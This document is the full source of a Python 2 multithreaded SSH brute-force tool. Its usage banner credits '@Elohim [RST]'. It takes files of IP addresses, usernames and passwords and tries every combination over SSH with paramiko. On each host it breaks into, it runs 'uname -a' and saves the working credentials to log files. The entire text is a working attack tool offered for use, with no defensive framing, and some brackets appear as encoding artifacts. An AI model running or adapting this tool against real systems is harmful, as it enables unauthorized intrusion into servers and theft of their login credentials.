SSH Scanner

import paramiko, sys, Queue, threading

class SSHBrute(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
    def run(self):
        while True:
            ip,user,passwd = self.queue.get()
            self.kraken(ip,user,passwd)
            self.queue.task_done()

    def kraken(self,ip,user,passwd):
        try:
            if ip in cracked: return False

            if '%user%' in str(passwd):
                passwd = passwd.split("%")***91;0***93; + user + passwd.split("%")***91;2***93;
            if '%User%' in str(passwd):
                pwd = user + passwd.split("%")***91;2***93;
                passwd = passwd.split("%")***91;0***93;+pwd.title()
            if str(passwd) == '%null%':
                passwd = ''

            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            ssh.connect(ip, username=user, password=passwd, timeout=35)
            raw.write(ip+' '+user+' '+passwd+'\n')
            raw.flush()
            chan = ssh.get_transport().open_session()
            chan.settimeout(35)
            chan.exec_command('uname -a')
            data = chan.recv(1024)

            if len(data) == 0:
                nologs.write(ip+' '+user+' '+passwd+'\n')
                nologs.flush()
                return False

            val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n')
            val.flush()
            cracked.append(ip)
            chan.close()
            ssh.close()
            return True
        except Exception, e:
            if 'uthent' in str(e):
                if dbg == 'bad':
                    bad.write(ip+'\n')
                    bad.flush()
                #print '\r***91;+***93;Tried '+ip+' '+user+' '+passwd+'                 '
                ssh.close()
                return False
            #print ip, str(e)
            ssh.close()
            return False

def brutemain():
    if len(sys.argv) < 2:
        print """
    SSH Brute Force Tool
    Author:           @Elohim ***91;RST***93;
    Usage:
       bruter ThreadNumber IpFile UserFile PassFile FilterSwitch*
      *The filter Switch Takes Either the word "bad" or "no".
       If you supply the word bad, it filters in bad.txt only the ips
       which indeed support ssh AUTH and password didn't work"""
        return False
    ThreadNR = int(sys.argv***91;1***93;)
    queue = Queue.Queue(maxsize=20000)
    try:
        i = 0
        for i in range(ThreadNR):
            t = SSHBrute(queue)
            t.daemon = True
            t.start()
            i += 1
    except Exception, e:
        print 'Cant start more than',i,'Threads!'

    global bad
    global val
    global nologs
    global cracked
    global raw
    cracked = ***91;***93;
    bad = open('bad.txt','w')
    val = open('valid.txt','a')
    nologs = open('nologins.txt','a')
    raw = open('raw.txt','a')
    with open(str(sys.argv***91;2***93;),'rU') as ipf: ips = ipf.read().splitlines()
    with open(str(sys.argv***91;3***93;),'rU') as uf: users = uf.read().splitlines()
    with open(str(sys.argv***91;4***93;),'rU') as pf: passwords = pf.read().splitlines()
    global dbg
    dbg = str(sys.argv***91;5***93;)

    try:
        for password in passwords:
            for user in users:
                for ip in ips:
                    queue.put((ip,user,password))
    except:
        pass

    queue.join()

if __name__ == "__main__":
    brutemain()